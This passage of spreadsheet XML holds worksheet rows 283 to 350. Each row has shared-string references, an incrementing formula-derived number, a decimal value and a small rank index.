    <row r="283" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A283" t="s">
        <v>544</v>
      </c>
      <c r="B283" t="s">
        <v>545</v>
      </c>
      <c r="C283">
        <f t="shared" si="4"/>
        <v>9783534</v>
      </c>
      <c r="D283" t="s">
        <v>547</v>
      </c>
      <c r="E283">
        <v>0.25854858756065369</v>
      </c>
      <c r="F283">
        <v>2</v>
      </c>
    </row>
    <row r="284" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A284" t="s">
        <v>548</v>
      </c>
      <c r="B284" t="s">
        <v>549</v>
      </c>
      <c r="C284">
        <f t="shared" si="4"/>
        <v>9784787</v>
      </c>
      <c r="D284" t="s">
        <v>550</v>
      </c>
      <c r="E284">
        <v>40.411762237548828</v>
      </c>
      <c r="F284">
        <v>1</v>
      </c>
    </row>
    <row r="285" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A285" t="s">
        <v>548</v>
      </c>
      <c r="B285" t="s">
        <v>549</v>
      </c>
      <c r="C285">
        <f t="shared" si="4"/>
        <v>9786040</v>
      </c>
      <c r="D285" t="s">
        <v>551</v>
      </c>
      <c r="E285">
        <v>1.225650906562805</v>
      </c>
      <c r="F285">
        <v>2</v>
      </c>
    </row>
    <row r="286" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A286" t="s">
        <v>552</v>
      </c>
      <c r="B286" t="s">
        <v>553</v>
      </c>
      <c r="C286">
        <f t="shared" si="4"/>
        <v>9787293</v>
      </c>
      <c r="D286" t="s">
        <v>554</v>
      </c>
      <c r="E286">
        <v>36.551097869873047</v>
      </c>
      <c r="F286">
        <v>1</v>
      </c>
    </row>
    <row r="287" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A287" t="s">
        <v>552</v>
      </c>
      <c r="B287" t="s">
        <v>553</v>
      </c>
      <c r="C287">
        <f t="shared" si="4"/>
        <v>9788546</v>
      </c>
      <c r="D287" t="s">
        <v>555</v>
      </c>
      <c r="E287">
        <v>10.775471687316889</v>
      </c>
      <c r="F287">
        <v>2</v>
      </c>
    </row>
    <row r="288" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A288" t="s">
        <v>556</v>
      </c>
      <c r="B288" t="s">
        <v>557</v>
      </c>
      <c r="C288">
        <f t="shared" si="4"/>
        <v>9789799</v>
      </c>
      <c r="D288" t="s">
        <v>558</v>
      </c>
      <c r="E288">
        <v>29.64982986450195</v>
      </c>
      <c r="F288">
        <v>1</v>
      </c>
    </row>
    <row r="289" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A289" t="s">
        <v>556</v>
      </c>
      <c r="B289" t="s">
        <v>557</v>
      </c>
      <c r="C289">
        <f t="shared" si="4"/>
        <v>9791052</v>
      </c>
      <c r="D289" t="s">
        <v>559</v>
      </c>
      <c r="E289">
        <v>4.9536380767822266</v>
      </c>
      <c r="F289">
        <v>2</v>
      </c>
    </row>
    <row r="290" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A290" t="s">
        <v>560</v>
      </c>
      <c r="B290" t="s">
        <v>561</v>
      </c>
      <c r="C290">
        <f t="shared" si="4"/>
        <v>9792305</v>
      </c>
      <c r="D290" t="s">
        <v>562</v>
      </c>
      <c r="E290">
        <v>21.324863433837891</v>
      </c>
      <c r="F290">
        <v>1</v>
      </c>
    </row>
    <row r="291" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A291" t="s">
        <v>560</v>
      </c>
      <c r="B291" t="s">
        <v>561</v>
      </c>
      <c r="C291">
        <f t="shared" si="4"/>
        <v>9793558</v>
      </c>
      <c r="D291" t="s">
        <v>563</v>
      </c>
      <c r="E291">
        <v>5.2771739959716797</v>
      </c>
      <c r="F291">
        <v>2</v>
      </c>
    </row>
    <row r="292" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A292" t="s">
        <v>564</v>
      </c>
      <c r="B292" t="s">
        <v>565</v>
      </c>
      <c r="C292">
        <f t="shared" si="4"/>
        <v>9794811</v>
      </c>
      <c r="D292" t="s">
        <v>566</v>
      </c>
      <c r="E292">
        <v>38.201805114746087</v>
      </c>
      <c r="F292">
        <v>1</v>
      </c>
    </row>
    <row r="293" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A293" t="s">
        <v>564</v>
      </c>
      <c r="B293" t="s">
        <v>565</v>
      </c>
      <c r="C293">
        <f t="shared" si="4"/>
        <v>9796064</v>
      </c>
      <c r="D293" t="s">
        <v>567</v>
      </c>
      <c r="E293">
        <v>12.05841159820557</v>
      </c>
      <c r="F293">
        <v>2</v>
      </c>
    </row>
    <row r="294" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A294" t="s">
        <v>568</v>
      </c>
      <c r="B294" t="s">
        <v>569</v>
      </c>
      <c r="C294">
        <f t="shared" si="4"/>
        <v>9797317</v>
      </c>
      <c r="D294" t="s">
        <v>570</v>
      </c>
      <c r="E294">
        <v>30.319271087646481</v>
      </c>
      <c r="F294">
        <v>1</v>
      </c>
    </row>
    <row r="295" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A295" t="s">
        <v>568</v>
      </c>
      <c r="B295" t="s">
        <v>569</v>
      </c>
      <c r="C295">
        <f t="shared" si="4"/>
        <v>9798570</v>
      </c>
      <c r="D295" t="s">
        <v>571</v>
      </c>
      <c r="E295">
        <v>30.292879104614261</v>
      </c>
      <c r="F295">
        <v>2</v>
      </c>
    </row>
    <row r="296" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A296" t="s">
        <v>568</v>
      </c>
      <c r="B296" t="s">
        <v>569</v>
      </c>
      <c r="C296">
        <f t="shared" si="4"/>
        <v>9799823</v>
      </c>
      <c r="D296" t="s">
        <v>572</v>
      </c>
      <c r="E296">
        <v>26.080221176147461</v>
      </c>
      <c r="F296">
        <v>3</v>
      </c>
    </row>
    <row r="297" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A297" t="s">
        <v>568</v>
      </c>
      <c r="B297" t="s">
        <v>569</v>
      </c>
      <c r="C297">
        <f t="shared" si="4"/>
        <v>9801076</v>
      </c>
      <c r="D297" t="s">
        <v>573</v>
      </c>
      <c r="E297">
        <v>1.366693496704102</v>
      </c>
      <c r="F297">
        <v>4</v>
      </c>
    </row>
    <row r="298" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A298" t="s">
        <v>574</v>
      </c>
      <c r="B298" t="s">
        <v>575</v>
      </c>
      <c r="C298">
        <f t="shared" si="4"/>
        <v>9802329</v>
      </c>
      <c r="D298" t="s">
        <v>576</v>
      </c>
      <c r="E298">
        <v>35.422710418701172</v>
      </c>
      <c r="F298">
        <v>1</v>
      </c>
    </row>
    <row r="299" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A299" t="s">
        <v>574</v>
      </c>
      <c r="B299" t="s">
        <v>575</v>
      </c>
      <c r="C299">
        <f t="shared" si="4"/>
        <v>9803582</v>
      </c>
      <c r="D299" t="s">
        <v>577</v>
      </c>
      <c r="E299">
        <v>7.5389318466186523</v>
      </c>
      <c r="F299">
        <v>2</v>
      </c>
    </row>
    <row r="300" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A300" t="s">
        <v>578</v>
      </c>
      <c r="B300" t="s">
        <v>579</v>
      </c>
      <c r="C300">
        <f t="shared" si="4"/>
        <v>9804835</v>
      </c>
      <c r="D300" t="s">
        <v>580</v>
      </c>
      <c r="E300">
        <v>31.029050827026371</v>
      </c>
      <c r="F300">
        <v>1</v>
      </c>
    </row>
    <row r="301" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A301" t="s">
        <v>578</v>
      </c>
      <c r="B301" t="s">
        <v>579</v>
      </c>
      <c r="C301">
        <f t="shared" si="4"/>
        <v>9806088</v>
      </c>
      <c r="D301" t="s">
        <v>581</v>
      </c>
      <c r="E301">
        <v>1.004508376121521</v>
      </c>
      <c r="F301">
        <v>2</v>
      </c>
    </row>
    <row r="302" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A302" t="s">
        <v>582</v>
      </c>
      <c r="B302" t="s">
        <v>583</v>
      </c>
      <c r="C302">
        <f t="shared" si="4"/>
        <v>9807341</v>
      </c>
      <c r="D302" t="s">
        <v>584</v>
      </c>
      <c r="E302">
        <v>26.34785079956055</v>
      </c>
      <c r="F302">
        <v>1</v>
      </c>
    </row>
    <row r="303" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A303" t="s">
        <v>582</v>
      </c>
      <c r="B303" t="s">
        <v>583</v>
      </c>
      <c r="C303">
        <f t="shared" si="4"/>
        <v>9808594</v>
      </c>
      <c r="D303" t="s">
        <v>585</v>
      </c>
      <c r="E303">
        <v>1.638810992240906</v>
      </c>
      <c r="F303">
        <v>2</v>
      </c>
    </row>
    <row r="304" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A304" t="s">
        <v>586</v>
      </c>
      <c r="B304" t="s">
        <v>587</v>
      </c>
      <c r="C304">
        <f t="shared" si="4"/>
        <v>9809847</v>
      </c>
      <c r="D304" t="s">
        <v>588</v>
      </c>
      <c r="E304">
        <v>26.62111854553223</v>
      </c>
      <c r="F304">
        <v>1</v>
      </c>
    </row>
    <row r="305" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A305" t="s">
        <v>586</v>
      </c>
      <c r="B305" t="s">
        <v>587</v>
      </c>
      <c r="C305">
        <f t="shared" si="4"/>
        <v>9811100</v>
      </c>
      <c r="D305" t="s">
        <v>589</v>
      </c>
      <c r="E305">
        <v>4.3432891834527249E-4</v>
      </c>
      <c r="F305">
        <v>2</v>
      </c>
    </row>
    <row r="306" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A306" t="s">
        <v>590</v>
      </c>
      <c r="B306" t="s">
        <v>591</v>
      </c>
      <c r="C306">
        <f t="shared" si="4"/>
        <v>9812353</v>
      </c>
      <c r="D306" t="s">
        <v>592</v>
      </c>
      <c r="E306">
        <v>17.2384147644043</v>
      </c>
      <c r="F306">
        <v>1</v>
      </c>
    </row>
    <row r="307" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A307" t="s">
        <v>590</v>
      </c>
      <c r="B307" t="s">
        <v>591</v>
      </c>
      <c r="C307">
        <f t="shared" si="4"/>
        <v>9813606</v>
      </c>
      <c r="D307" t="s">
        <v>593</v>
      </c>
      <c r="E307">
        <v>13.040054321289061</v>
      </c>
      <c r="F307">
        <v>2</v>
      </c>
    </row>
    <row r="308" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A308" t="s">
        <v>594</v>
      </c>
      <c r="B308" t="s">
        <v>595</v>
      </c>
      <c r="C308">
        <f t="shared" si="4"/>
        <v>9814859</v>
      </c>
      <c r="D308" t="s">
        <v>596</v>
      </c>
      <c r="E308">
        <v>28.358669281005859</v>
      </c>
      <c r="F308">
        <v>1</v>
      </c>
    </row>
    <row r="309" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A309" t="s">
        <v>594</v>
      </c>
      <c r="B309" t="s">
        <v>595</v>
      </c>
      <c r="C309">
        <f t="shared" si="4"/>
        <v>9816112</v>
      </c>
      <c r="D309" t="s">
        <v>597</v>
      </c>
      <c r="E309">
        <v>1.9107286930084231</v>
      </c>
      <c r="F309">
        <v>2</v>
      </c>
    </row>
    <row r="310" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A310" t="s">
        <v>598</v>
      </c>
      <c r="B310" t="s">
        <v>599</v>
      </c>
      <c r="C310">
        <f t="shared" si="4"/>
        <v>9817365</v>
      </c>
      <c r="D310" t="s">
        <v>600</v>
      </c>
      <c r="E310">
        <v>32.086219787597663</v>
      </c>
      <c r="F310">
        <v>1</v>
      </c>
    </row>
    <row r="311" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A311" t="s">
        <v>598</v>
      </c>
      <c r="B311" t="s">
        <v>599</v>
      </c>
      <c r="C311">
        <f t="shared" si="4"/>
        <v>9818618</v>
      </c>
      <c r="D311" t="s">
        <v>601</v>
      </c>
      <c r="E311">
        <v>2.6315422058105469</v>
      </c>
      <c r="F311">
        <v>2</v>
      </c>
    </row>
    <row r="312" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A312" t="s">
        <v>602</v>
      </c>
      <c r="B312" t="s">
        <v>603</v>
      </c>
      <c r="C312">
        <f t="shared" si="4"/>
        <v>9819871</v>
      </c>
      <c r="D312" t="s">
        <v>604</v>
      </c>
      <c r="E312">
        <v>19.50468635559082</v>
      </c>
      <c r="F312">
        <v>1</v>
      </c>
    </row>
    <row r="313" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A313" t="s">
        <v>602</v>
      </c>
      <c r="B313" t="s">
        <v>603</v>
      </c>
      <c r="C313">
        <f t="shared" si="4"/>
        <v>9821124</v>
      </c>
      <c r="D313" t="s">
        <v>605</v>
      </c>
      <c r="E313">
        <v>11.619890213012701</v>
      </c>
      <c r="F313">
        <v>2</v>
      </c>
    </row>
    <row r="314" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A314" t="s">
        <v>606</v>
      </c>
      <c r="B314" t="s">
        <v>607</v>
      </c>
      <c r="C314">
        <f t="shared" si="4"/>
        <v>9822377</v>
      </c>
      <c r="D314" t="s">
        <v>608</v>
      </c>
      <c r="E314">
        <v>21.509601593017582</v>
      </c>
      <c r="F314">
        <v>1</v>
      </c>
    </row>
    <row r="315" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A315" t="s">
        <v>606</v>
      </c>
      <c r="B315" t="s">
        <v>607</v>
      </c>
      <c r="C315">
        <f t="shared" si="4"/>
        <v>9823630</v>
      </c>
      <c r="D315" t="s">
        <v>609</v>
      </c>
      <c r="E315">
        <v>1.5574313402175901</v>
      </c>
      <c r="F315">
        <v>2</v>
      </c>
    </row>
    <row r="316" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A316" t="s">
        <v>610</v>
      </c>
      <c r="B316" t="s">
        <v>611</v>
      </c>
      <c r="C316">
        <f t="shared" si="4"/>
        <v>9824883</v>
      </c>
      <c r="D316" t="s">
        <v>612</v>
      </c>
      <c r="E316">
        <v>23.709941864013668</v>
      </c>
      <c r="F316">
        <v>1</v>
      </c>
    </row>
    <row r="317" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A317" t="s">
        <v>610</v>
      </c>
      <c r="B317" t="s">
        <v>611</v>
      </c>
      <c r="C317">
        <f t="shared" si="4"/>
        <v>9826136</v>
      </c>
      <c r="D317" t="s">
        <v>613</v>
      </c>
      <c r="E317">
        <v>7.6255159378051758</v>
      </c>
      <c r="F317">
        <v>2</v>
      </c>
    </row>
    <row r="318" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A318" t="s">
        <v>614</v>
      </c>
      <c r="B318" t="s">
        <v>615</v>
      </c>
      <c r="C318">
        <f t="shared" si="4"/>
        <v>9827389</v>
      </c>
      <c r="D318" t="s">
        <v>616</v>
      </c>
      <c r="E318">
        <v>29.687772750854489</v>
      </c>
      <c r="F318">
        <v>1</v>
      </c>
    </row>
    <row r="319" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A319" t="s">
        <v>614</v>
      </c>
      <c r="B319" t="s">
        <v>617</v>
      </c>
      <c r="C319">
        <f t="shared" si="4"/>
        <v>9828642</v>
      </c>
      <c r="D319" t="s">
        <v>618</v>
      </c>
      <c r="E319">
        <v>29.44504356384277</v>
      </c>
      <c r="F319">
        <v>2</v>
      </c>
    </row>
    <row r="320" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A320" t="s">
        <v>614</v>
      </c>
      <c r="B320" t="s">
        <v>619</v>
      </c>
      <c r="C320">
        <f t="shared" si="4"/>
        <v>9829895</v>
      </c>
      <c r="D320" t="s">
        <v>620</v>
      </c>
      <c r="E320">
        <v>22.98405838012695</v>
      </c>
      <c r="F320">
        <v>3</v>
      </c>
    </row>
    <row r="321" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A321" t="s">
        <v>614</v>
      </c>
      <c r="B321" t="s">
        <v>615</v>
      </c>
      <c r="C321">
        <f t="shared" si="4"/>
        <v>9831148</v>
      </c>
      <c r="D321" t="s">
        <v>621</v>
      </c>
      <c r="E321">
        <v>0.41856968402862549</v>
      </c>
      <c r="F321">
        <v>4</v>
      </c>
    </row>
    <row r="322" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A322" t="s">
        <v>622</v>
      </c>
      <c r="B322" t="s">
        <v>623</v>
      </c>
      <c r="C322">
        <f t="shared" si="4"/>
        <v>9832401</v>
      </c>
      <c r="D322" t="s">
        <v>624</v>
      </c>
      <c r="E322">
        <v>29.350395202636719</v>
      </c>
      <c r="F322">
        <v>1</v>
      </c>
    </row>
    <row r="323" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A323" t="s">
        <v>622</v>
      </c>
      <c r="B323" t="s">
        <v>623</v>
      </c>
      <c r="C323">
        <f t="shared" si="4"/>
        <v>9833654</v>
      </c>
      <c r="D323" t="s">
        <v>625</v>
      </c>
      <c r="E323">
        <v>10.73961162567139</v>
      </c>
      <c r="F323">
        <v>2</v>
      </c>
    </row>
    <row r="324" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A324" t="s">
        <v>626</v>
      </c>
      <c r="B324" t="s">
        <v>627</v>
      </c>
      <c r="C324">
        <f t="shared" si="4"/>
        <v>9834907</v>
      </c>
      <c r="D324" t="s">
        <v>628</v>
      </c>
      <c r="E324">
        <v>29.040058135986332</v>
      </c>
      <c r="F324">
        <v>1</v>
      </c>
    </row>
    <row r="325" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A325" t="s">
        <v>626</v>
      </c>
      <c r="B325" t="s">
        <v>627</v>
      </c>
      <c r="C325">
        <f t="shared" si="4"/>
        <v>9836160</v>
      </c>
      <c r="D325" t="s">
        <v>629</v>
      </c>
      <c r="E325">
        <v>11.681661605834959</v>
      </c>
      <c r="F325">
        <v>2</v>
      </c>
    </row>
    <row r="326" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A326" t="s">
        <v>630</v>
      </c>
      <c r="B326" t="s">
        <v>631</v>
      </c>
      <c r="C326">
        <f t="shared" si="4"/>
        <v>9837413</v>
      </c>
      <c r="D326" t="s">
        <v>632</v>
      </c>
      <c r="E326">
        <v>26.470354080200199</v>
      </c>
      <c r="F326">
        <v>1</v>
      </c>
    </row>
    <row r="327" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A327" t="s">
        <v>630</v>
      </c>
      <c r="B327" t="s">
        <v>631</v>
      </c>
      <c r="C327">
        <f t="shared" si="4"/>
        <v>9838666</v>
      </c>
      <c r="D327" t="s">
        <v>633</v>
      </c>
      <c r="E327">
        <v>13.606796264648439</v>
      </c>
      <c r="F327">
        <v>2</v>
      </c>
    </row>
    <row r="328" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A328" t="s">
        <v>634</v>
      </c>
      <c r="B328" t="s">
        <v>635</v>
      </c>
      <c r="C328">
        <f t="shared" si="4"/>
        <v>9839919</v>
      </c>
      <c r="D328" t="s">
        <v>636</v>
      </c>
      <c r="E328">
        <v>27.441041946411129</v>
      </c>
      <c r="F328">
        <v>1</v>
      </c>
    </row>
    <row r="329" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A329" t="s">
        <v>634</v>
      </c>
      <c r="B329" t="s">
        <v>635</v>
      </c>
      <c r="C329">
        <f t="shared" si="4"/>
        <v>9841172</v>
      </c>
      <c r="D329" t="s">
        <v>637</v>
      </c>
      <c r="E329">
        <v>3.5910096168518071</v>
      </c>
      <c r="F329">
        <v>2</v>
      </c>
    </row>
    <row r="330" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A330" t="s">
        <v>638</v>
      </c>
      <c r="B330" t="s">
        <v>639</v>
      </c>
      <c r="C330">
        <f t="shared" ref="C330:C393" si="5">C329+1253</f>
        <v>9842425</v>
      </c>
      <c r="D330" t="s">
        <v>640</v>
      </c>
      <c r="E330">
        <v>19.908184051513668</v>
      </c>
      <c r="F330">
        <v>1</v>
      </c>
    </row>
    <row r="331" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A331" t="s">
        <v>638</v>
      </c>
      <c r="B331" t="s">
        <v>639</v>
      </c>
      <c r="C331">
        <f t="shared" si="5"/>
        <v>9843678</v>
      </c>
      <c r="D331" t="s">
        <v>641</v>
      </c>
      <c r="E331">
        <v>11.97274780273438</v>
      </c>
      <c r="F331">
        <v>2</v>
      </c>
    </row>
    <row r="332" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A332" t="s">
        <v>642</v>
      </c>
      <c r="B332" t="s">
        <v>643</v>
      </c>
      <c r="C332">
        <f t="shared" si="5"/>
        <v>9844931</v>
      </c>
      <c r="D332" t="s">
        <v>644</v>
      </c>
      <c r="E332">
        <v>22.309787750244141</v>
      </c>
      <c r="F332">
        <v>1</v>
      </c>
    </row>
    <row r="333" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A333" t="s">
        <v>642</v>
      </c>
      <c r="B333" t="s">
        <v>643</v>
      </c>
      <c r="C333">
        <f t="shared" si="5"/>
        <v>9846184</v>
      </c>
      <c r="D333" t="s">
        <v>645</v>
      </c>
      <c r="E333">
        <v>4.3906526565551758</v>
      </c>
      <c r="F333">
        <v>2</v>
      </c>
    </row>
    <row r="334" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A334" t="s">
        <v>646</v>
      </c>
      <c r="B334" t="s">
        <v>647</v>
      </c>
      <c r="C334">
        <f t="shared" si="5"/>
        <v>9847437</v>
      </c>
      <c r="D334" t="s">
        <v>648</v>
      </c>
      <c r="E334">
        <v>29.216690063476559</v>
      </c>
      <c r="F334">
        <v>1</v>
      </c>
    </row>
    <row r="335" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A335" t="s">
        <v>646</v>
      </c>
      <c r="B335" t="s">
        <v>647</v>
      </c>
      <c r="C335">
        <f t="shared" si="5"/>
        <v>9848690</v>
      </c>
      <c r="D335" t="s">
        <v>649</v>
      </c>
      <c r="E335">
        <v>5.3719659335911274E-3</v>
      </c>
      <c r="F335">
        <v>2</v>
      </c>
    </row>
    <row r="336" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A336" t="s">
        <v>650</v>
      </c>
      <c r="B336" t="s">
        <v>651</v>
      </c>
      <c r="C336">
        <f t="shared" si="5"/>
        <v>9849943</v>
      </c>
      <c r="D336" t="s">
        <v>652</v>
      </c>
      <c r="E336">
        <v>21.090240478515621</v>
      </c>
      <c r="F336">
        <v>1</v>
      </c>
    </row>
    <row r="337" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A337" t="s">
        <v>650</v>
      </c>
      <c r="B337" t="s">
        <v>651</v>
      </c>
      <c r="C337">
        <f t="shared" si="5"/>
        <v>9851196</v>
      </c>
      <c r="D337" t="s">
        <v>653</v>
      </c>
      <c r="E337">
        <v>14.02730560302734</v>
      </c>
      <c r="F337">
        <v>2</v>
      </c>
    </row>
    <row r="338" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A338" t="s">
        <v>654</v>
      </c>
      <c r="B338" t="s">
        <v>655</v>
      </c>
      <c r="C338">
        <f t="shared" si="5"/>
        <v>9852449</v>
      </c>
      <c r="D338" t="s">
        <v>656</v>
      </c>
      <c r="E338">
        <v>30.883562088012699</v>
      </c>
      <c r="F338">
        <v>1</v>
      </c>
    </row>
    <row r="339" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A339" t="s">
        <v>654</v>
      </c>
      <c r="B339" t="s">
        <v>655</v>
      </c>
      <c r="C339">
        <f t="shared" si="5"/>
        <v>9853702</v>
      </c>
      <c r="D339" t="s">
        <v>657</v>
      </c>
      <c r="E339">
        <v>16.492557525634769</v>
      </c>
      <c r="F339">
        <v>2</v>
      </c>
    </row>
    <row r="340" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A340" t="s">
        <v>658</v>
      </c>
      <c r="B340" t="s">
        <v>659</v>
      </c>
      <c r="C340">
        <f t="shared" si="5"/>
        <v>9854955</v>
      </c>
      <c r="D340" t="s">
        <v>660</v>
      </c>
      <c r="E340">
        <v>29.050466537475589</v>
      </c>
      <c r="F340">
        <v>1</v>
      </c>
    </row>
    <row r="341" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A341" t="s">
        <v>658</v>
      </c>
      <c r="B341" t="s">
        <v>659</v>
      </c>
      <c r="C341">
        <f t="shared" si="5"/>
        <v>9856208</v>
      </c>
      <c r="D341" t="s">
        <v>661</v>
      </c>
      <c r="E341">
        <v>7.8057665824890137</v>
      </c>
      <c r="F341">
        <v>2</v>
      </c>
    </row>
    <row r="342" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A342" t="s">
        <v>662</v>
      </c>
      <c r="B342" t="s">
        <v>663</v>
      </c>
      <c r="C342">
        <f t="shared" si="5"/>
        <v>9857461</v>
      </c>
      <c r="D342" t="s">
        <v>664</v>
      </c>
      <c r="E342">
        <v>33.256622314453118</v>
      </c>
      <c r="F342">
        <v>1</v>
      </c>
    </row>
    <row r="343" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A343" t="s">
        <v>662</v>
      </c>
      <c r="B343" t="s">
        <v>663</v>
      </c>
      <c r="C343">
        <f t="shared" si="5"/>
        <v>9858714</v>
      </c>
      <c r="D343" t="s">
        <v>665</v>
      </c>
      <c r="E343">
        <v>17.749687194824219</v>
      </c>
      <c r="F343">
        <v>2</v>
      </c>
    </row>
    <row r="344" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A344" t="s">
        <v>666</v>
      </c>
      <c r="B344" t="s">
        <v>667</v>
      </c>
      <c r="C344">
        <f t="shared" si="5"/>
        <v>9859967</v>
      </c>
      <c r="D344" t="s">
        <v>668</v>
      </c>
      <c r="E344">
        <v>29.575063705444339</v>
      </c>
      <c r="F344">
        <v>1</v>
      </c>
    </row>
    <row r="345" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A345" t="s">
        <v>666</v>
      </c>
      <c r="B345" t="s">
        <v>667</v>
      </c>
      <c r="C345">
        <f t="shared" si="5"/>
        <v>9861220</v>
      </c>
      <c r="D345" t="s">
        <v>669</v>
      </c>
      <c r="E345">
        <v>8.4634032100439072E-4</v>
      </c>
      <c r="F345">
        <v>2</v>
      </c>
    </row>
    <row r="346" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A346" t="s">
        <v>670</v>
      </c>
      <c r="B346" t="s">
        <v>671</v>
      </c>
      <c r="C346">
        <f t="shared" si="5"/>
        <v>9862473</v>
      </c>
      <c r="D346" t="s">
        <v>672</v>
      </c>
      <c r="E346">
        <v>35.363246917724609</v>
      </c>
      <c r="F346">
        <v>1</v>
      </c>
    </row>
    <row r="347" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A347" t="s">
        <v>670</v>
      </c>
      <c r="B347" t="s">
        <v>671</v>
      </c>
      <c r="C347">
        <f t="shared" si="5"/>
        <v>9863726</v>
      </c>
      <c r="D347" t="s">
        <v>673</v>
      </c>
      <c r="E347">
        <v>13.115153312683111</v>
      </c>
      <c r="F347">
        <v>2</v>
      </c>
    </row>
    <row r="348" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A348" t="s">
        <v>674</v>
      </c>
      <c r="B348" t="s">
        <v>675</v>
      </c>
      <c r="C348">
        <f t="shared" si="5"/>
        <v>9864979</v>
      </c>
      <c r="D348" t="s">
        <v>676</v>
      </c>
      <c r="E348">
        <v>25.256061553955082</v>
      </c>
      <c r="F348">
        <v>1</v>
      </c>
    </row>
    <row r="349" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A349" t="s">
        <v>674</v>
      </c>
      <c r="B349" t="s">
        <v>675</v>
      </c>
      <c r="C349">
        <f t="shared" si="5"/>
        <v>9866232</v>
      </c>
      <c r="D349" t="s">
        <v>677</v>
      </c>
      <c r="E349">
        <v>11.48818302154541</v>
      </c>
      <c r="F349">
        <v>2</v>
      </c>
    </row>
    <row r="350" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A350" t="s">
        <v>678</v>
      </c>
      <c r="B350" t="s">
        <v>679</v>
      </c>
      <c r="C350">
        <f t="shared" si="5"/>
        <v>9867485</v>
      </c>
      <c r="D350" t="s">
        <v>680</v>
      </c>
      <c r="E350">
        <v>31.088180541992191</v>
      </c>
      <c r="F350">
        <v>1</v>
      </c>
    </row>
